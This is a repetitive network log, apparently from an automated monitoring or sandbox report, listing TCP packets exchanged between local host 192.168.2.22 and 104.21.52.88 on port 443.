Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
